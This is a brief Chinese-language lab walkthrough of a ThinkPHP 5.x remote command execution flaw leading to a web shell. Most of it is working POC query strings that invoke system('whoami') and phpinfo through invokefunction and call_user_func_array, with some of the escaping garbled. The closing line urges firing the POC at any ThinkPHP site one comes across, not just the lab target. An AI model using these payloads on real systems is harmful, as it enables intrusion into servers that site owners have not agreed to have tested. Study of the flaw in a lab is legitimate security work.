Thinkphp5x远程命令执行及getshell
开启环境,访问靶场
可以用工具进行检测是否存在漏洞
存在漏洞可以直接用工具get shell
也可以手工操作
远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
\]=whoami  ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的 站,直接打poc就可以了